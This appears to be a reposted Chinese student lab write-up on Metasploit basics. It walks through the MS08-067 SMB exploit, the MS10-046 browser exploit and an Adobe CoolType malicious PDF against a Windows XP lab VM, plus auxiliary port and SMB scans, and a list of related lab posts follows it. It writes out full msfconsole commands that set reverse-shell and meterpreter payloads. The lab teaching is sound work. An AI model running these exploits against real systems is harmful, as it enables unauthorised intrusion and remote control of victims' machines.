Exp5 MSF基础应用

最新推荐文章于 2024-10-10 13:45:00 发布
最新推荐文章于 2024-10-10 13:45:00 发布
阅读量175 收藏
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/zhangweiye20154330/p/8933701.html
版权

【实践要求】

1.一个主动攻击,如ms08_067

2.一个针对浏览器的攻击,如ms11_050

3.一个针对客户端的攻击,如Adobe

4.成功应用任何一个辅助模块

【基础知识问答】

用自己的话解释什么是exploit,payload,encode

  • exploit渗透攻击模块,利用发现的安全漏洞对远程系统进行攻击
  • Payload攻击载荷模块,渗透攻击成功后在目标系统中运行的代码,exploit把payload运过去,payload实现攻击
  • Encode编码器模块,为了确保Exploit、payload “安全”,不会混入“坏字符”

【实践过程】

准备:
安装英文版xp系统
1350877-20180424210433587-2144847110.png
ip
1350877-20180424210449942-62589155.png
1350877-20180424210456407-104749639.png

1.Windows服务渗透攻击——MS08-067安全漏洞
调用该模块,并且查看可以使用的payload

use exploit/windows/smb/ms08_067_netapi
1350877-20180424210527800-591285173.png

show payloads 查看需要设置的信息

set payload generic/shell_reverse_tcp设置payload,tcp反向回连

set LHOST 192.168.29.129 攻击机kali ip

set LPORT 4330攻击端口

set RHOST 192.168.29.130靶机winxp ip

set target 0自动选择目标系统类型,匹配度较高

1350877-20180424210734650-676358369.png

show options看一下配置是否都正确

最后exploit开启监听

1350877-20180424210910923-1002324351.png

纳尼。。。不成功什么鬼
找原因原来是xp防火墙没关 尴尬

好了很完美

1350877-20180424210923903-1830415586.png

2. 对浏览器攻击:ms10_046漏洞攻击

基本步骤还是和上面一样

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用
show payloads
查看可以供我们使用的payload:

1350877-20180426192048228-1856956253.png

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

设置好参数后,进行查看:

使用exploit指令执行漏洞,可以看到生成了一个url:

1350877-20180426192112936-134759272.png

在靶机的IE浏览器上使用该url进行访问

1350877-20180426192129488-1261020209.png

在MSF终端看见漏洞执行成功:

1350877-20180426192157321-1179239615.png

ok

3.针对Adobe的攻击

search adobe 搜索可以用来攻击adobe软件的模块,选择一个使用。
我选择的是adobe_cooltype_sing

use exploit/windows/browser/adobe_cooltype_sing

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.29.129

set LPORT 4330

set FILENAME 20154330.pdf

1350877-20180426210413325-185060097.png

同理,设置payload 、LHOST 、LPORT 、文件名称,输入exploit 就能生成,由于我用的是 browser 下的攻击模块,所以它会生成一个 url 链接,点开会自动下载一个空白的 pdf 文件。

1350877-20180426210431168-1611737432.png

拷贝到xp系统打开
1350877-20180426210454526-1189095152.png

出现Successfully
输入sessions查看当前存在的会话,可以看到存在两个回话

1350877-20180426210545084-1208735951.png

我们选择第一个
sessions -i 1
1350877-20180426210631684-356321204.png

查看一下ip
ok

4.辅助模块应用

找了一个tcp端口扫描的辅助模块感觉好简单所以就多找了几个

4.1tcp端口扫描

使用指令 use auxiliary/scanner/portscan/tcp 扫描目标主机上TCP使用的端口号,设置下靶机IP,run.

1350877-20180426212419336-1926791879.png

4.2smb_version

使用指令 show auxiliary 可以查看当前版本可用的辅助功能模块

使用 scanner/smb/smb_version 可以查看靶机的smb版本,输入指令 show options查看需要设定的配置。

设定完后,run 运行。

1350877-20180426212438610-1552786273.png

4.3检测常用的udp服务

使用指令 use auxiliary/scanner/discovery/udp_sweep 检测目标主机上常用的udp服务,设置下靶机IP就行。

1350877-20180426212449183-1989723222.png
我们可以看一下xp系统上的mac地址
1350877-20180426213028379-40106469.png
完美!!!!!

【实践体会】

本次实践主要是善意的攻击别人电脑(渗透测试)。本次实验分为四个小实验,相对而言都是比较简单的,但是我觉得都特别有意思,以后有时间可以经常试试windows7的或者windows10也是可以的,总之xp系统的攻击不能说是特别娴熟,但是相关漏洞只要能够看的懂,都可以一试,至于成不成功那就不好说了呀。。。。

转载于:https://www.cnblogs.com/zhangweiye20154330/p/8933701.html

aicong1881
关注
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 407
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Exp6 MSF应用基础
qq_57435798的博客
05-04 679
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。exploit是载具,连接漏洞,将payload传送到靶机中。payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;
EXP5 MSF基础应用
weixin_30904593的博客
04-27 232
一、实验内容 (1)一个主动攻击,如ms08_067; (2) 一个针对浏览器的攻击,如ms11_050; (3)一个针对客户端的攻击,如Adobe; (4)成功应用任何一个辅助模块。 二、实验步骤 (一)windows服务渗透攻击(MS08-067漏洞攻击) 1.使攻击机与靶机相互ping通 2.启动msf终端。 使用search命令搜索该漏洞对应的模块: 启用该渗透...
Exp5 MSF基础应用
weixin_30323961的博客
04-20 110
一、基础知识回答 用自己的话解释什么是exploit,payload,encodeexploit:exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。payload:被送到靶机上负责攻击的代码。encode:是编码器,对代码进行各种运...
EXP5 msf基础应用
dianquekuai3232的博客
04-20 166
一、基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算、去除坏字符等等,保护payload不被发现 二、实践过程 ...
20155209 Exp5 MSF基础应用
weixin_30702887的博客
04-29 170
Exp5 MSF基础应用 实验准备 在实验之前,上网搜集了很多有关Metasploit渗透测试的资料。对这次实验影响最大的是一篇最受欢迎的10个Metasploit模块和插件。排名第一位的是MSB-MS12-020,比MSB-MS08-067这个经典漏洞的排名还高。我就实验了这个,而且本次实验中很多试了一下这里面的受欢迎漏洞。但是大多数没成功。 实验MSB-MS12-020时,发现他是辅助模块下...
20165306 Exp5 MSF基础应用
weixin_34037515的博客
04-20 205
Exp5 MSF基础应用 一、实践概述 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。实现: 1.1一个主动攻击实践 ms08-067+windows/shell_reverse_tcp(成功) 1.2 一个针对浏览器的攻击 ms17_010_eternalblue+generic/shell_reverse_tcp(成功) 1.3 一个...
Exp5 MSF基础应用 20164314
weixin_30426065的博客
04-19 115
一、实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.一个主动攻击实践,如ms08_067; (成功) 2.一个针对浏览器的攻击,如ms11_050;(成功) 3. 一个针对客户端的攻击,如Adobe;(成功) 4.成功应用任何一个辅助模块。(成功且唯一) 二、实践过程 准备工作:首先先确定...
20155325 Exp5 MSF基础应用
azxkjsh204704390的博客
05-01 129
目录 实验内容 遇到的问题 基础问题问答 老师!!!我实验三的C代码已经删除了,请求评分~~~ 实验内容 1.Windows服务渗透攻击——MS08-067 系统 虚拟机 参考博客 Windows XP Windows-XP-professional 2017-2018-2 20155303『网络对抗技术』Exp5MSF基础应用 攻击成功 2.Interne...
20155339 Exp5 MSF基础应用
weixin_30460489的博客
04-28 83
20155339 Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. 答: exploit是通过自己选择的漏洞和载荷进行攻击的一个过程。 payload是一段载荷代码,通过这段代码来运行漏洞程序进行对靶机的攻击。 encode是对攻击代码进行编码,保护其能正常运行并且改变其特征码。 实践总结与体会 这次的实践比起前面来说比较实际,但...
20194311姜晨昊Exp6-MSF应用基础
weixin_51927594的博客
05-10 602
零、实验准备 安装win7虚拟机,迅雷下载种子如下 ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/ VM简易安装,一直下一步即可 一、实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。 1.1 一个主动攻击实践 使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 永恒之蓝是指201
20194307肖江宇Exp5—信息搜集与漏洞扫描
MYRLY的博客
04-21 331
20194307肖江宇Exp5—信息搜集与漏洞扫描 一、实践目标 掌握信息搜集的最基础技能与常用工具的使用方法 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(以自己主机为目标) 漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞(以自己主机为目标) 二、实践内容 1. 各种搜索技巧的应用 (1) 搜索网址目录结构 msfconsole use auxiliary/scanner/http/dir_scanner set THR
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)零基础入门到精通,收藏这一篇就够了_kalilinux
weixin_57514792的博客
10-07 1197
最新kali linux入门及常用简单工具介绍
Macbook ToDesk 无法连接网络
Primer5
10-04 346
检查登录项,看到后台运行项目是关闭状态,允许后台运行之后返回查看立马显示网络连接正常。网络连接的是 Wi-Fi,打开浏览器能跟正常浏览内容,说明 Wi-Fi 是正常的。检查防火墙是没有阻止ToDesk 的任何连接,说明防火墙也是正常的。
网络风暴产生原因、危害、预防和解决方法
luotuo28的博客
10-09 430
网络风暴是指由于某种原因引发的网络中数据流量急剧增加,导致网络性能严重下降甚至瘫痪的现象。
网络安全学习路线图(2024版详解)
最新发布
baimaozi008的博客
10-10 743
近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以的完成上岸,还能够系统化学习,提升自己的后期竞争力。
Netty 相比原生IO模型的优势
lssffy的博客
10-09 606
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
网络扫描模块python-nmap案例解析
we chat:玩转测试开发
10-07 458
它可以方便地在 Python 脚本中执行网络扫描,并解析 Nmap 的输出结果。python-nmap 模块是进行网络扫描的强大工具,通过简单的接口和丰富的功能,开发者可以轻松地在 Python 中集成网络安全检查和资产发现功能。6.1执行扫描:在 run_nmap_scan 函数中,创建了一个 nmap.PortScanner 实例,并使用 scan() 方法执行网络扫描。6.2 解析结果:扫描结果通过访问 scanner.all_hosts() 方法获取,并打印每个主机的状态和开放的端口信息。
Network - 网络端口
guoqx的专栏
10-07 1042
客户端使用从一系列可用端口(通常为 49152 至 65535,称为 “短暂端口”)中随机分配的端口启动通信。- 网络服务器(如 Apache 或 Nginx)通过 80 端口(HTTP)或 443 端口(HTTPS)监听。- 当客户端连接到服务器时,它知道服务器的 IP 地址和端口号,但它自己的端口号是由操作系统动态分配的。- 例如 网络服务器通常监听 80 端口(HTTP)或 443 端口(HTTPS)。- 服务器使用一个特定的、众所周知的端口来监听传入请求(如 HTTP 的 80 端口)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值